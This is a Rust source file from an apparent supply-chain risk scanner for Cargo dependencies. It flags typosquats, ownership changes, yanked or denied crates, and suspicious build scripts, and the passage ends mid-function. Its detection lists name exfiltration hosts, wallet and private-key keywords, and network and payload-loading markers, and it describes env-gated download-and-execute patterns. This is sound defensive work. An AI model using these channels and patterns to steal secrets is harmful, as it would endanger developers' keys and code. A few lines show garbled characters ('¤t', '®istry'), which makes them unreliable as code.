1use crate::errors::RustinelError;
2use crate::lockfile::{LockfileModel, Package};
3use crate::AnalysisOptions;
4use serde::{Deserialize, Serialize};
5use std::path::{Path, PathBuf};
6
/// One piece of supporting evidence attached to a [`RiskSignal`].
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Evidence {
    /// Category label for the evidence. Callers in this file pass values such as
    /// `"heuristic"`, `"registry"`, `"source"`, `"manifest"`, `"policy"` and `"path"`.
    pub kind: String,
    /// Optional file path the evidence points at; left out of serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub path: Option<String>,
    /// Human-readable description of what was observed.
    pub summary: String,
}
14
15impl Evidence {
16 pub fn new(kind: &str, summary: impl Into<String>) -> Self {
17 Self {
18 kind: kind.into(),
19 path: None,
20 summary: summary.into(),
21 }
22 }
23
24 pub fn with_path(kind: &str, path: impl Into<String>, summary: impl Into<String>) -> Self {
25 Self {
26 kind: kind.into(),
27 path: Some(path.into()),
28 summary: summary.into(),
29 }
30 }
31}
32
/// A single risk finding about one package, produced by the collectors in this module.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct RiskSignal {
    /// Stable identifier of the finding type (e.g. `"yanked_crate"`, `"possible_typosquat"`).
    pub id: String,
    /// Package identifier string. Collectors in this file fill it from `package.id.to_string()`;
    /// other code here recovers the crate name by taking the part before the first `@`.
    pub package: String,
    /// Severity bucket; the primary sort key in [`sort_signals`] (most severe first).
    pub severity: Severity,
    /// Numeric weight of the finding. NOTE(review): presumably summed into an overall risk
    /// score elsewhere — the consumer is not visible in this file.
    pub weight: u8,
    /// Collector's confidence in the finding. Values used in this file lie between 0.3 and 1.0.
    pub confidence: f32,
    /// Supporting evidence, in the order it was attached.
    pub evidence: Vec<Evidence>,
    /// Suggested follow-up action for the reader of the report.
    pub recommendation: String,
}
43
/// Severity bucket of a [`RiskSignal`].
///
/// The derived ordering follows declaration order, so `Info < Low < Medium < High < Critical`.
/// Serialized in `snake_case` (e.g. `"critical"`).
#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, PartialOrd, Ord)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    /// Informational only; signals at this level are skipped by `annotate_dependency_paths`.
    Info,
    Low,
    Medium,
    High,
    Critical,
}
53
54impl Severity {
55 pub fn as_str(&self) -> &'static str {
56 match self {
57 Severity::Info => "info",
58 Severity::Low => "low",
59 Severity::Medium => "medium",
60 Severity::High => "high",
61 Severity::Critical => "critical",
62 }
63 }
64}
65
66pub fn collect_basic_signals(
71 lock: &LockfileModel,
72 options: &AnalysisOptions,
73) -> Result<Vec<RiskSignal>, RustinelError> {
74 let mut signals = Vec::new();
75
76 collect_multiple_versions(lock, &mut signals);
77 collect_name_heuristics(lock, &mut signals);
78 collect_typosquat(lock, options, &mut signals);
79 collect_source_substitution(lock, &mut signals);
80 collect_freshness(lock, options, &mut signals);
81 collect_owners_changed(lock, options, &mut signals);
82 collect_yanked(lock, options, &mut signals);
83 collect_denied(lock, options, &mut signals);
84
85 if let Some(source_root) = options.source_root() {
86 collect_source_signals(lock, &source_root, &mut signals)?;
87 }
88
89 apply_known_good_baseline(&mut signals);
90 annotate_dependency_paths(lock, &mut signals);
91 sort_signals(&mut signals);
92 Ok(signals)
93}
94
95fn annotate_dependency_paths(lock: &LockfileModel, signals: &mut [RiskSignal]) {
99 let paths = crate::graph::dependency_paths(lock);
100 for signal in signals.iter_mut() {
101 if signal.severity <= Severity::Info {
102 continue;
103 }
104 let name = signal.package.split('@').next().unwrap_or(&signal.package);
105 if let Some(path) = paths.get(name) {
106 if path.len() >= 2 {
107 signal.evidence.push(Evidence::new(
108 "path",
109 format!("pulled in via: {}", crate::graph::format_path(path)),
110 ));
111 }
112 }
113 }
114}
115
116fn collect_owners_changed(
122 lock: &LockfileModel,
123 options: &AnalysisOptions,
124 signals: &mut Vec<RiskSignal>,
125) {
126 if options.trusted_owners.is_empty() {
127 return;
128 }
129 let mut done = std::collections::BTreeSet::new();
130 for package in lock.registry_packages() {
131 if !package.id.is_crates_io() {
134 continue;
135 }
136 let name = package.id.name.as_str();
137 if done.contains(name) {
141 continue;
142 }
143 let Some(trusted) = options.trusted_owners.get(name) else {
144 continue;
145 };
146 let Some(meta) = options.metadata.get(&package.id.to_string()) else {
147 continue;
148 };
149 if meta.owners.is_empty() {
150 continue;
151 }
152 done.insert(name.to_string());
153 let current: std::collections::BTreeSet<&str> =
154 meta.owners.iter().map(String::as_str).collect();
155 let baseline: std::collections::BTreeSet<&str> =
156 trusted.iter().map(String::as_str).collect();
157 if current == baseline {
158 continue;
159 }
160 let added: Vec<&str> = current.difference(&baseline).copied().collect();
161 let removed: Vec<&str> = baseline.difference(¤t).copied().collect();
162 let mut parts = Vec::new();
163 if !added.is_empty() {
164 parts.push(format!("new owner(s): {}", added.join(", ")));
165 }
166 if !removed.is_empty() {
167 parts.push(format!("removed owner(s): {}", removed.join(", ")));
168 }
169 signals.push(RiskSignal {
170 id: "owners_changed".into(),
171 package: package.id.to_string(),
172 severity: Severity::Medium,
173 weight: 20,
174 confidence: 1.0,
175 evidence: vec![Evidence::new(
176 "registry",
177 format!(
178 "crates.io owners changed since trusted ({}) — a new maintainer is the supply-chain takeover vector (xz, event-stream)",
179 parts.join("; ")
180 ),
181 )],
182 recommendation:
183 "Verify the ownership change is legitimate, then refresh the baseline with `cargo rustinel trust`."
184 .into(),
185 });
186 }
187}
188
189fn collect_source_substitution(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
196 for package in lock.registry_packages() {
197 let name = package.id.name.as_str();
198 if !POPULAR_CRATES.contains(&name) {
199 continue;
200 }
201 if package.id.is_crates_io() {
202 continue;
203 }
204 let source = package.id.source.as_deref().unwrap_or("an unknown source");
205 signals.push(RiskSignal {
206 id: "source_substitution".into(),
207 package: package.id.to_string(),
208 severity: Severity::Medium,
209 weight: 18,
210 confidence: 0.7,
211 evidence: vec![Evidence::new(
212 "source",
213 format!(
214 "the popular crate `{name}` resolves from a non-crates.io source ({source}) — \
215 verify this is an intended fork or mirror, not a dependency-confusion substitution"
216 ),
217 )],
218 recommendation:
219 "Confirm why a well-known crate name comes from a non-crates.io source. If it is \
220 not an intentional patch, this is the dependency-confusion vector — pin the \
221 crates.io source."
222 .into(),
223 });
224 }
225}
226
227fn collect_yanked(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
231 if options.yanked.is_empty() {
232 return;
233 }
234 for package in lock.registry_packages() {
235 if !package.id.is_crates_io() {
238 continue;
239 }
240 let id = package.id.to_string();
241 if options.yanked.contains(&id) {
242 signals.push(RiskSignal {
243 id: "yanked_crate".into(),
244 package: id,
245 severity: Severity::Medium,
246 weight: 25,
247 confidence: 1.0,
248 evidence: vec![Evidence::new(
249 "registry",
250 "this exact version has been yanked from the registry",
251 )],
252 recommendation: "Update to a non-yanked version, or replace this dependency."
253 .into(),
254 });
255 }
256 }
257}
258
259fn collect_denied(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
265 let Some(policy) = &options.policy else {
266 return;
267 };
268 let Some(deny) = &policy.deny else {
269 return;
270 };
271 if deny.crates.is_empty() {
272 return;
273 }
274 for package in lock.registry_packages() {
275 if deny.crates.iter().any(|c| c == &package.id.name) {
276 signals.push(RiskSignal {
277 id: "denied_crate".into(),
278 package: package.id.to_string(),
279 severity: Severity::High,
280 weight: 0,
281 confidence: 1.0,
282 evidence: vec![Evidence::new(
283 "policy",
284 format!("`{}` is on the policy deny list", package.id.name),
285 )],
286 recommendation: "Remove this dependency, or remove it from the policy deny list."
287 .into(),
288 });
289 }
290 }
291}
292
293pub fn sort_signals(signals: &mut [RiskSignal]) {
296 signals.sort_by(|a, b| {
297 b.severity
298 .cmp(&a.severity)
299 .then_with(|| a.id.cmp(&b.id))
300 .then_with(|| a.package.cmp(&b.package))
301 });
302}
303
304fn collect_multiple_versions(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
305 for (name, packages) in lock.by_name() {
306 let registry: Vec<&&Package> = packages.iter().filter(|p| !p.id.is_local()).collect();
308 if registry.len() > 1 {
309 for package in ®istry {
310 signals.push(RiskSignal {
311 id: "multiple_versions_same_crate".into(),
312 package: package.id.to_string(),
313 severity: Severity::Low,
314 weight: 3,
315 confidence: 1.0,
316 evidence: vec![Evidence::with_path(
317 "lockfile",
318 lock.path.display().to_string(),
319 format!(
320 "{} distinct versions of `{name}` are present",
321 registry.len()
322 ),
323 )],
324 recommendation: "Consider deduplicating dependency versions where feasible."
325 .into(),
326 });
327 }
328 }
329 }
330}
331
332fn collect_name_heuristics(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
333 for package in lock.registry_packages() {
334 if package.id.name.ends_with("-sys") {
335 signals.push(RiskSignal {
339 id: "native_ffi_detected".into(),
340 package: package.id.to_string(),
341 severity: Severity::Low,
342 weight: 8,
343 confidence: 0.6,
344 evidence: vec![Evidence::new(
345 "heuristic",
346 "crate name ends with `-sys`, a convention for native/FFI bindings",
347 )],
348 recommendation:
349 "Review the native dependency and its build process before merging.".into(),
350 });
351 }
352 }
353}
354
/// Names of well-known crates.
///
/// Used in this file as (a) the set of names that must resolve from crates.io
/// (`collect_source_substitution`) and (b) the targets a dependency name is compared
/// against when looking for one-edit near-misses (`nearest_popular`). `nearest_popular`
/// returns the first match in list order, so the order of entries can affect which
/// target is reported.
pub const POPULAR_CRATES: &[&str] = &[
    "serde",
    "serde_json",
    "serde_derive",
    "tokio",
    "tokio-util",
    "reqwest",
    "hyper",
    "rand",
    "regex",
    "syn",
    "quote",
    "proc-macro2",
    "libc",
    "log",
    "env_logger",
    "tracing",
    "tracing-subscriber",
    "anyhow",
    "thiserror",
    "clap",
    "futures",
    "bytes",
    "chrono",
    "time",
    "uuid",
    "itertools",
    "rayon",
    "crossbeam",
    "parking_lot",
    "once_cell",
    "lazy_static",
    "base64",
    "hex",
    "sha2",
    "sha1",
    "md5",
    "digest",
    "hmac",
    "aes",
    "mime",
    "md-5",
    "anes",
    "rustls",
    "ring",
    "openssl",
    "openssl-sys",
    "native-tls",
    "url",
    "http",
    "h2",
    "mio",
    "socket2",
    "num",
    "num-traits",
    "num-bigint",
    "bitflags",
    "cfg-if",
    "memchr",
    "smallvec",
    "indexmap",
    "hashbrown",
    "ahash",
    "toml",
    "serde_yaml",
    "csv",
    "flate2",
    "zip",
    "tar",
    "walkdir",
    "tempfile",
    "dirs",
    "which",
    "semver",
    "git2",
    "nix",
    "winapi",
    "windows-sys",
    "async-trait",
    "async-std",
    "actix-web",
    "axum",
    "tower",
    "diesel",
    "sqlx",
    "redis",
    "mongodb",
    "prost",
    "tonic",
    "serde_urlencoded",
    "percent-encoding",
    "idna",
    "unicode-normalization",
    "getrandom",
    "rand_core",
    "crc32fast",
    "miniz_oxide",
    "backtrace",
    "addr2line",
    "object",
    "gimli",
    "wasm-bindgen",
    "js-sys",
    "web-sys",
    "tokio-stream",
    "tower-http",
    "tonic-build",
    "tungstenite",
    "tokio-tungstenite",
    "reqwest-middleware",
    "hyper-tls",
    "hyper-util",
    "rustls-pemfile",
    "webpki-roots",
    "trust-dns-resolver",
    "warp",
    "rocket",
    "actix",
    "actix-rt",
    "async-channel",
    "futures-util",
    "futures-core",
    "pin-project",
    "pin-project-lite",
    "bincode",
    "rmp-serde",
    "postcard",
    "serde_with",
    "serde_repr",
    "toml_edit",
    "ron",
    "quick-xml",
    "roxmltree",
    "prost-build",
    "protobuf",
    "arrow",
    "polars",
    "clap_derive",
    "clap_complete",
    "structopt",
    "argh",
    "console",
    "indicatif",
    "dialoguer",
    "color-eyre",
    "eyre",
    "miette",
    "config",
    "dotenvy",
    "directories",
    "blake3",
    "blake2",
    "sha3",
    "ed25519-dalek",
    "curve25519-dalek",
    "x25519-dalek",
    "rsa",
    "chacha20poly1305",
    "argon2",
    "bcrypt",
    "subtle",
    "zeroize",
    "rand_chacha",
    "time-macros",
    "humantime",
    "bigdecimal",
    "rust_decimal",
    "ordered-float",
    "unicode-width",
    "unicode-segmentation",
    "aho-corasick",
    "regex-syntax",
    "fancy-regex",
    "nom",
    "pest",
    "logos",
    "async-stream",
    "dashmap",
    "flume",
    "arc-swap",
    "thread_local",
    "num_cpus",
    "rayon-core",
    "crossbeam-channel",
    "crossbeam-utils",
    "sea-orm",
    "rusqlite",
    "deadpool",
    "r2d2",
    "sled",
    "rocksdb",
    "proptest",
    "quickcheck",
    "mockall",
    "insta",
    "criterion",
    "trybuild",
    "paste",
    "strum",
    "derive_more",
    "darling",
];
572
/// Download count at or above which `collect_typosquat` treats a near-miss crate name as
/// established and emits no signal for it.
const TYPOSQUAT_TRUST_DOWNLOADS: u64 = 10_000;
582
583fn collect_typosquat(
584 lock: &LockfileModel,
585 options: &AnalysisOptions,
586 signals: &mut Vec<RiskSignal>,
587) {
588 for package in lock.registry_packages() {
589 let name = package.id.name.as_str();
590 if POPULAR_CRATES.contains(&name) || is_known_good(name) {
591 continue;
592 }
593 if name.len() < 4 {
595 continue;
596 }
597 let Some(target) = nearest_popular(name) else {
598 continue;
599 };
600 let downloads = options
606 .metadata
607 .get(&package.id.to_string())
608 .and_then(|m| m.total_downloads);
609 let base =
610 format!("crate name `{name}` is one edit away from the popular crate `{target}`");
611 let signal = match downloads {
612 Some(d) if d >= TYPOSQUAT_TRUST_DOWNLOADS => continue,
614 Some(d) => RiskSignal {
616 id: "possible_typosquat".into(),
617 package: package.id.to_string(),
618 severity: Severity::Medium,
619 weight: 18,
620 confidence: 0.85,
621 evidence: vec![Evidence::new(
622 "heuristic",
623 format!("{base}, and has only {d} downloads — likely typosquat / impersonation"),
624 )],
625 recommendation:
626 "Verify the publisher and source; this is very likely not the crate you intended."
627 .into(),
628 },
629 None => RiskSignal {
631 id: "possible_typosquat".into(),
632 package: package.id.to_string(),
633 severity: Severity::Info,
634 weight: 0,
635 confidence: 0.3,
636 evidence: vec![Evidence::new(
637 "heuristic",
638 format!("{base} — trust unverified offline (re-run with --online-metadata)"),
639 )],
640 recommendation:
641 "Run with --online-metadata to corroborate against download counts before acting."
642 .into(),
643 },
644 };
645 signals.push(signal);
646 }
647}
648
/// Maximum age, in days (inclusive), at which `collect_freshness` still reports a
/// version as freshly published.
const FRESH_DAYS: u64 = 14;
653
654fn collect_freshness(
659 lock: &LockfileModel,
660 options: &AnalysisOptions,
661 signals: &mut Vec<RiskSignal>,
662) {
663 for package in lock.registry_packages() {
664 if !package.id.is_crates_io() {
667 continue;
668 }
669 let Some(meta) = options.metadata.get(&package.id.to_string()) else {
670 continue;
671 };
672 let Some(days) = meta.published_days_ago else {
673 continue;
674 };
675 if days > FRESH_DAYS {
676 continue;
677 }
678 signals.push(RiskSignal {
679 id: "freshly_published".into(),
680 package: package.id.to_string(),
681 severity: Severity::Low,
682 weight: 6,
683 confidence: 1.0,
684 evidence: vec![Evidence::new(
685 "registry",
686 format!(
687 "version published {days} day(s) ago — recently published code has had little time for review or for advisories to surface"
688 ),
689 )],
690 recommendation:
691 "Confirm this version bump is intended; freshly published versions are the window for supply-chain attacks."
692 .into(),
693 });
694 }
695}
696
697pub fn typosquat_target(name: &str) -> Option<&'static str> {
704 if POPULAR_CRATES.contains(&name) || is_known_good(name) || name.len() < 4 {
705 return None;
706 }
707 nearest_popular(name)
708}
709
710fn nearest_popular(name: &str) -> Option<&'static str> {
712 POPULAR_CRATES
713 .iter()
714 .copied()
715 .find(|p| *p != name && damerau_levenshtein(name, p) == 1)
716}
717
/// Edit distance between `a` and `b`, counting insertions, deletions, substitutions and
/// swaps of two adjacent bytes as one edit each.
///
/// The comparison is byte-wise and keeps only three rows of the distance table. Because
/// only the row two steps back is consulted for swaps, a swapped pair is never edited
/// again (so `"ca"` → `"abc"` costs 3).
pub(crate) fn damerau_levenshtein(a: &str, b: &str) -> usize {
    let (lhs, rhs) = (a.as_bytes(), b.as_bytes());
    if lhs.is_empty() {
        return rhs.len();
    }
    if rhs.is_empty() {
        return lhs.len();
    }

    let width = rhs.len() + 1;
    let mut two_back = vec![0usize; width];
    let mut one_back: Vec<usize> = (0..width).collect();
    let mut row = vec![0usize; width];

    for (i, &x) in lhs.iter().enumerate() {
        row[0] = i + 1;
        for (j, &y) in rhs.iter().enumerate() {
            let deletion = one_back[j + 1] + 1;
            let insertion = row[j] + 1;
            let substitution = one_back[j] + usize::from(x != y);
            let mut best = deletion.min(insertion).min(substitution);
            // Adjacent transposition: the current pair matches the previous pair, swapped.
            if i > 0 && j > 0 && x == rhs[j - 1] && lhs[i - 1] == y {
                best = best.min(two_back[j - 1] + 1);
            }
            row[j + 1] = best;
        }
        // Rotate the rows: `one_back` becomes `two_back`, `row` becomes `one_back`, and
        // the old `two_back` buffer is reused as scratch for the next row.
        std::mem::swap(&mut two_back, &mut one_back);
        std::mem::swap(&mut one_back, &mut row);
    }
    one_back[rhs.len()]
}
748
/// Substrings treated as signs of network access.
///
/// Matched with plain `str::contains`: against `build.rs` content in
/// `build_script_intent_signal`, against whole `.rs` files in `scan_source_exfil`, and
/// line by line in `env_gated_block`.
const BUILD_RS_NETWORK: &[&str] = &[
    "reqwest",
    "ureq",
    "hyper",
    "isahc",
    "curl",
    "TcpStream",
    "std::net",
    "minreq",
    "attohttpc",
    "tokio::net",
];
/// Substrings that `build_script_intent_signal` reports as "embedded payload / dynamic
/// loading" when found in a build script. Matched with plain `str::contains`.
const BUILD_RS_PAYLOAD: &[&str] = &[
    "include_bytes!",
    "base64::decode",
    "STANDARD.decode",
    "from_base64",
    "hex::decode",
    "libloading::",
    "dlopen(",
];
778
/// Substrings that `scan_source_exfil` treats as references to wallet or private-key
/// material.
///
/// Every entry is matched literally with `str::contains`. That includes the last two:
/// the alphabet fragment and the `[0-9a-fA-F]{64}` text only hit when the scanned source
/// itself contains those exact characters. NOTE(review): presumably meant to catch code
/// that embeds a Base58 alphabet or a 64-hex-digit regex — confirm.
const SECRET_MARKERS: &[&str] = &[
    "base58",
    "Base58",
    "private_key",
    "private key",
    "PRIVATE KEY",
    "keypair",
    "secp256k1",
    "mnemonic",
    "seed phrase",
    "solana",
    "Solana",
    "ethereum",
    "Ethereum",
    "wallet",
    "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijk",
    "[0-9a-fA-F]{64}",
];
/// Substrings indicating directory walking or file reading. `scan_source_exfil` counts a
/// file as "scanning sources" only when one of these is present together with the
/// literal `".rs"` (including the quotes).
const SOURCE_SCAN: &[&str] = &[
    "read_dir",
    "WalkDir",
    "walkdir",
    "read_to_string",
    "fs::read",
];
813
/// Host or domain substrings that `scan_source_exfil` reports whenever they appear in a
/// crate's `.rs` source, with no further corroboration. Checked before
/// `DUAL_USE_EXFIL_DOMAINS`; the first hit in list order is the one recorded.
const EXFIL_HOST_DOMAINS: &[&str] = &[
    ".workers.dev",
    "pastebin.com",
    "paste.ee",
    "transfer.sh",
    "0x0.st",
    "anonfiles.com",
    "webhook.site",
    "requestbin",
    "pipedream.net",
    ".ngrok.io",
    ".ngrok-free.app",
];
836
/// Endpoint substrings that `scan_source_exfil` reports only when the same file also
/// contains one of the `SECRET_MARKERS`, and only if no `EXFIL_HOST_DOMAINS` entry matched.
const DUAL_USE_EXFIL_DOMAINS: &[&str] = &[
    "api.telegram.org",
    "ip-api.com",
    "discord.com/api/webhooks",
    "discordapp.com/api/webhooks",
];
848
849fn env_gated_block(content: &str) -> bool {
858 const WINDOW: usize = 25;
859 const ENV: &[&str] = &["env::var", "var_os"];
860 const SPAWN: &[&str] = &["Command::new", "process::Command", "libc::system"];
861 let lines: Vec<&str> = content.lines().collect();
862 for (i, line) in lines.iter().enumerate() {
863 if !BUILD_RS_NETWORK.iter().any(|m| line.contains(m)) {
864 continue;
865 }
866 let lo = i.saturating_sub(WINDOW);
867 let hi = (i + WINDOW + 1).min(lines.len());
868 let window = &lines[lo..hi];
869 let gated = window.iter().any(|l| ENV.iter().any(|m| l.contains(m)));
870 let spawns = window.iter().any(|l| SPAWN.iter().any(|m| l.contains(m)));
871 if gated && spawns {
872 return true;
873 }
874 }
875 false
876}
877
/// Accumulated result of `scan_source_exfil` for one crate. Each field records the first
/// match found during the walk; later matches do not overwrite it.
#[derive(Default)]
struct ExfilScan {
    /// Suspicious domain substring that was found.
    exfil_domain: Option<String>,
    /// File in which a suspicious domain was found.
    domain_sample: Option<PathBuf>,
    /// File for which `env_gated_block` returned true.
    env_gated_sample: Option<PathBuf>,
    /// File that scans `.rs` sources and also has network or secret markers.
    source_exfil_sample: Option<PathBuf>,
    /// Whether `source_exfil_sample` contained a network marker.
    source_exfil_network: bool,
    /// Whether `source_exfil_sample` contained a secret marker.
    source_exfil_secrets: bool,
}
893
894impl ExfilScan {
895 fn any_match(&self) -> bool {
896 self.source_exfil_sample.is_some()
897 || self.domain_sample.is_some()
898 || self.env_gated_sample.is_some()
899 }
900}
901
902fn sorted_dir_entries(dir: &Path) -> Vec<std::fs::DirEntry> {
911 let Ok(rd) = std::fs::read_dir(dir) else {
912 return Vec::new();
913 };
914 let mut entries: Vec<_> = rd
922 .flatten()
923 .take(crate::safety::MAX_DIR_ENTRIES.saturating_add(1))
924 .collect();
925 entries.sort_by_key(|e| e.file_name());
926 entries
927}
928
929fn scan_source_exfil(crate_dir: &Path) -> Option<ExfilScan> {
932 use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
933 let mut found = ExfilScan::default();
934 let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
935 vec![(crate_dir.join("src"), 0)]
936 } else {
937 vec![(crate_dir.to_path_buf(), 0)]
938 };
939 let mut visited = 0usize;
940 'walk: while let Some((dir, depth)) = stack.pop() {
941 for entry in sorted_dir_entries(&dir) {
942 if visited >= MAX_DIR_ENTRIES {
943 break 'walk;
946 }
947 visited += 1;
948 let Ok(ft) = entry.file_type() else { continue };
949 if ft.is_symlink() {
950 continue;
951 }
952 let path = entry.path();
953 if ft.is_dir() {
954 if depth < MAX_DIR_DEPTH {
955 stack.push((path, depth + 1));
956 }
957 continue;
958 }
959 if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
960 if let Some(c) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES) {
961 let scans = c.contains("\".rs\"") && SOURCE_SCAN.iter().any(|m| c.contains(m));
962 let net = BUILD_RS_NETWORK.iter().any(|m| c.contains(m));
963 let sec = SECRET_MARKERS.iter().any(|m| c.contains(m));
964 let domain_here =
967 EXFIL_HOST_DOMAINS
968 .iter()
969 .find(|d| c.contains(**d))
970 .or_else(|| {
971 sec.then(|| DUAL_USE_EXFIL_DOMAINS.iter().find(|d| c.contains(**d)))
972 .flatten()
973 });
974 let env_gated = env_gated_block(&c);
979 if scans && (net || sec) && found.source_exfil_sample.is_none() {
984 found.source_exfil_sample = Some(path.clone());
985 found.source_exfil_network = net;
986 found.source_exfil_secrets = sec;
987 }
988 if let Some(d) = domain_here {
989 if found.exfil_domain.is_none() {
990 found.exfil_domain = Some((*d).to_string());
991 }
992 if found.domain_sample.is_none() {
993 found.domain_sample = Some(path.clone());
994 }
995 }
996 if env_gated && found.env_gated_sample.is_none() {
997 found.env_gated_sample = Some(path.clone());
998 }
999 }
1000 }
1001 }
1002 }
1003 found.any_match().then_some(found)
1004}
1005
1006fn source_exfil_signal(package: &str, network: bool, secrets: bool, path: String) -> RiskSignal {
1010 let mut what = Vec::new();
1011 if network {
1012 what.push("exfiltrates over the network");
1013 }
1014 if secrets {
1015 what.push("references wallet/private-key material");
1016 }
1017 RiskSignal {
1018 id: "suspicious_source_exfil".into(),
1019 package: package.to_string(),
1020 severity: Severity::High,
1021 weight: 26,
1022 confidence: 0.6,
1023 evidence: vec![
1024 Evidence::with_path(
1025 "source",
1026 path,
1027 "runtime source scans the project's `.rs` files (scanned statically, never executed)",
1028 ),
1029 Evidence::new(
1030 "heuristic",
1031 format!("…and {} — matches the faster_log/async_println crypto-stealer pattern", what.join(" and ")),
1032 ),
1033 ],
1034 recommendation:
1035 "A dependency that reads your source files and exfiltrates/handles secrets is almost \
1036 certainly malicious. Do not build it; report it to the registry."
1037 .into(),
1038 }
1039}
1040
1041fn exfil_domain_signal(package: &str, domain: &str, path: String) -> RiskSignal {
1048 RiskSignal {
1049 id: "suspicious_exfil_domain".into(),
1050 package: package.to_string(),
1051 severity: Severity::Medium,
1052 weight: 18,
1053 confidence: 0.5,
1054 evidence: vec![Evidence::with_path(
1055 "source",
1056 path,
1057 format!(
1058 "runtime source references `{domain}`, a domain class commonly used for data exfiltration (scanned statically, never executed)"
1059 ),
1060 )],
1061 recommendation:
1062 "Confirm why this dependency contacts that endpoint. Cloudflare Workers, Telegram, \
1063 IP-geolocation and paste/webhook services are common exfiltration channels — the \
1064 faster_log crypto-stealer (Sept 2025) shipped harvested keys to a `*.workers.dev` URL."
1065 .into(),
1066 }
1067}
1068
1069fn env_gated_payload_signal(package: &str, path: String) -> RiskSignal {
1074 RiskSignal {
1075 id: "env_gated_payload".into(),
1076 package: package.to_string(),
1077 severity: Severity::High,
1078 weight: 24,
1079 confidence: 0.5,
1080 evidence: vec![Evidence::with_path(
1081 "source",
1082 path,
1083 "runtime source reads an environment variable, makes a network request, and spawns a \
1084 process — the env-gated remote-payload pattern (scanned statically, never executed)",
1085 )],
1086 recommendation:
1087 "A dependency that gates a download-and-execute on an environment variable (e.g. a CI \
1088 flag) is the rustdecimal supply-chain pattern. Review this code before building; \
1089 report it if it is not yours."
1090 .into(),
1091 }
1092}
1093
1094pub(crate) fn build_script_intent_signal(
1096 package: &str,
1097 content: &str,
1098 path: String,
1099) -> Option<RiskSignal> {
1100 let net: Vec<&str> = BUILD_RS_NETWORK
1101 .iter()
1102 .copied()
1103 .filter(|m| content.contains(*m))
1104 .collect();
1105 let payload: Vec<&str> = BUILD_RS_PAYLOAD
1106 .iter()
1107 .copied()
1108 .filter(|m| content.contains(*m))
1109 .collect();
1110
1111 if net.is_empty() && payload.is_empty() {
1112 return None;
1113 }
1114
1115 let (severity, weight) = if !net.is_empty() {
1116 (Severity::High, 28)
1117 } else {
1118 (Severity::Medium, 16)
1119 };
1120
1121 let mut evidence = vec![Evidence::with_path(
1122 "source",
1123 path,
1124 "build.rs shows anomalous intent (scanned statically, never executed)",
1125 )];
1126 if !net.is_empty() {
1127 evidence.push(Evidence::new(
1128 "heuristic",
1129 format!("network access in build script: {}", net.join(", ")),
1130 ));
1131 }
1132 if !payload.is_empty() {
1133 evidence.push(Evidence::new(
1134 "heuristic",
1135 format!("embedded payload / dynamic loading: {}", payload.join(", ")),
1136 ));
1137 }
1138
1139 Some(RiskSignal {
1140 id: "build_script_suspicious".into(),
1141 package: package.to_string(),
1142 severity,
1143 weight,
1144 confidence: 0.8,
1145 evidence,
1146 recommendation:
1147 "A build script that reaches the network or unpacks an opaque payload is a known \
1148 malware vector. Manually review build.rs before building this crate."
1149 .into(),
1150 })
1151}
1152
/// Crate names treated as a known-good baseline.
///
/// Names on this list are never reported as typosquats (`collect_typosquat`,
/// `typosquat_target`), and most other signals about them are downgraded to `Info` with
/// zero weight by `apply_known_good_baseline`.
///
/// NOTE(review): the first part of the list looks like ubiquitous platform/ecosystem
/// crates; the later part looks like legitimate crates whose names sit close to popular
/// ones (allow-listed to avoid typosquat false positives) — confirm against the list's
/// maintenance notes.
pub const KNOWN_GOOD_CRATES: &[&str] = &[
    "libc",
    "windows-sys",
    "windows-targets",
    "windows_aarch64_gnullvm",
    "windows_aarch64_msvc",
    "windows_i686_gnu",
    "windows_i686_gnullvm",
    "windows_i686_msvc",
    "windows_x86_64_gnu",
    "windows_x86_64_gnullvm",
    "windows_x86_64_msvc",
    "linux-raw-sys",
    "core-foundation-sys",
    "errno",
    "js-sys",
    "web-sys",
    "wasm-bindgen",
    "wasm-bindgen-backend",
    "wasm-bindgen-shared",
    "bitflags",
    "cfg-if",
    "memchr",
    "once_cell",
    "smallvec",
    "rustix",
    "getrandom",
    "base62",
    "bhttp",
    "boml",
    "byte",
    "cfg-iif",
    "chttp",
    "clamp",
    "cmac",
    "coap",
    "cuid",
    "ehttp",
    "ghash",
    "httm",
    "http2",
    "hyper2",
    "hyperx",
    "hypher",
    "idea",
    "index-map",
    "iter_tools",
    "lhash",
    "lib0",
    "libm",
    "manyhow",
    "mise",
    "nbytes",
    "nuid",
    "objekt",
    "ohttp",
    "openssh",
    "pastel",
    "pastey",
    "pasts",
    "ping",
    "pmac",
    "rbase64",
    "rend",
    "rinf",
    "rlibc",
    "rustis",
    "rxing",
    "serde_json5",
    "serde_yaml2",
    "serde_yml",
    "sha-1",
    "shaq",
    "socket",
    "str0m",
    "tdigest",
    "temp-file",
    "tide",
    "timer",
    "tokio-utils",
    "tomlq",
    "uguid",
    "ulid",
    "utime",
    "uuid7",
];
1248
1249pub fn is_known_good(name: &str) -> bool {
1252 KNOWN_GOOD_CRATES.contains(&name)
1253}
1254
1255fn apply_known_good_baseline(signals: &mut [RiskSignal]) {
1258 for signal in signals.iter_mut() {
1259 if signal.id.starts_with("advisory_")
1267 || signal.id == "yanked_crate"
1268 || signal.id == "build_script_suspicious"
1269 || signal.id == "suspicious_source_exfil"
1270 || signal.id == "suspicious_exfil_domain"
1271 || signal.id == "env_gated_payload"
1272 || signal.id == "possible_typosquat"
1273 || signal.id == "owners_changed"
1274 || signal.id == "source_substitution"
1275 || signal.id == "denied_crate"
1276 {
1277 continue;
1278 }
1279 let name = signal.package.split('@').next().unwrap_or(&signal.package);
1280 if is_known_good(name) {
1281 signal.severity = Severity::Info;
1282 signal.weight = 0;
1283 signal.evidence.push(Evidence::new(
1284 "baseline",
